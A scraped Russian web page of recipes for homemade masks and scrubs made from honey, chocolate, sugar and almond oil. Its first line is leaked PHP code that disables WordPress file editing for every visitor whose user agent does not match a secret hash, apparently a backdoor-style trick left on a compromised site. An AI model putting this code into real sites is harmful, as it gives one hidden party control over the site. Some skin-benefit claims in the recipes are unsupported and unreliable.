if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Натуральная косметика из сладостей. Рецепты масок и скрабов из шоколада, меда и сахара | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Натуральная косметика из сладостей. Рецепты масок и скрабов из шоколада, меда и сахара

Все мы очень любим сладости, но для стройности фигуры мы вынуждены исключить эти маленькие радости из своего рациона. Но представьте, что есть сладости, которые нужно употреблять ежедневно, но в качестве… косметики.

Все мы очень любим сла­до­сти, но для строй­но­сти фигу­ры мы вынуж­де­ны исклю­чить эти малень­кие радо­сти из сво­е­го раци­о­на. Но пред­ставь­те, что есть сла­до­сти, кото­рые нуж­но упо­треб­лять еже­днев­но, но в каче­стве… кос­ме­ти­ки. Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми, при­го­тов­лен­ная с помо­щью неко­то­рых слад­ких про­дук­тов, дает отлич­ный кос­ме­ти­че­ский эффект для нашей кожи.

Мед

000

О целеб­ных свой­ствах это­го про­дук­та зна­ли еще издрев­ле, да и совре­мен­ная нау­ка все­рьез изу­чи­ла мед и выяс­ни­ла, что саха­ра, вхо­дя­щие в его состав, увлаж­ня­ют и омо­ла­жи­ва­ют кожу, а вита­ми­ны, кис­ло­ты и соли мик­ро­эле­мен­тов обла­да­ют хоро­шим про­ти­во­вос­па­ли­тель­ным дей­стви­ем. Имен­но поэто­му уход за кожей лица обя­за­тель­но дол­жен вклю­чать медо­вые маски.

Пита­тель­ная медо­вая мас­ка для лица

Соеди­ни­те 1 чай­ную лож­ку гли­це­ри­на с ¼ ч. лож­кой меда. Пита­тель­ную смесь нане­си­те на лицо на 12 минут. После такой мас­ки кожа заси­я­ет энер­ги­ей, кра­со­той, при­об­ре­тет кра­си­вый и ров­ный цвет.

Медо­вая мас­ка для рук

Сме­шай­те по чай­ной лож­ке теп­ло­го олив­ко­во­го мас­ла и меда, нане­си­те на кожу рук и поверх обя­за­тель­но одень­те хлоп­ча­то­бу­маж­ные пер­чат­ки. Подер­жи­те пол­ча­са и смой­те. Руки после такой про­це­ду­ры ста­нут мяг­кие и увлажненные.

Шоколад

00

В состав шоко­ла­да все­гда вхо­дит кофе­ин, кото­рый при­оста­нав­ли­ва­ет про­цесс ста­ре­ния, сти­му­ли­ру­ет кле­точ­ный мета­бо­лизм, борет­ся с нена­вист­ным цел­люли­том. Веще­ства, вхо­дя­щие в состав шоко­ла­да, увлаж­ня­ют и под­тя­ги­ва­ют кожу, при­да­ют ей кра­си­вый цвет.

Анти­воз­раст­ная шоко­лад­ная маска

50 гр. горь­ко­го шоко­ла­да нуж­но рас­то­пить и сме­шать с 1 ч. л. рас­ти­тель­но­го мас­ла. Смесь немно­го осту­дить, нане­сти на лицо и шею на 15 минут и смыть.

Сахар

В кос­ме­ти­че­ских целях сахар чаще все­го исполь­зу­ют в соста­ве раз­лич­ных скра­бов, кото­рые за счет вхо­дя­щих в него кри­стал­лов экс­фо­ли­ан­та пре­крас­но очи­ща­ют и насы­ща­ют кис­ло­ро­дом кожу, спо­соб­ствуя ее обнов­ле­нию. В соста­ве кос­ме­ти­че­ских средств чаще исполь­зу­ют трост­ни­ко­вый сахар, так как он богат мине­ра­ла­ми и витаминами.

Анти­цел­люлит­ный сахар­ный скраб

Для его при­го­тов­ле­ния возь­ми­те ста­кан трост­ни­ко­во­го саха­ра, 2–3 ст. л. мас­ла мин­да­ля, пару капель эфир­но­го мас­ла лимо­на. Сде­лай­те лег­кий мас­саж бедер, нати­рая их полу­чен­ной сме­сью, после хоро­шень­ко смойте.

Миндальное масло

Это супер­пи­та­тель­ное мас­ло бога­то раз­лич­ны­ми вита­ми­на­ми и жир­ны­ми кис­ло­та­ми, кото­рые пре­крас­но пита­ет, вос­ста­нав­ли­ва­ет и под­тя­ги­ва­ет кожу, а так­же может исполь­зо­вать­ся как основ­ной уход за волосами.

Мин­даль­ная мас­ка для кожи лица

1 ч. л. мас­ла мин­да­ля нуж­но сме­шать с 1 ч. л. сока лимо­на, нане­сти на кожу лица и шеи на 15 мин. Такая тони­зи­ру­ю­щая мас­ка под­хо­дит для любо­го воз­рас­та и типа кожи.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!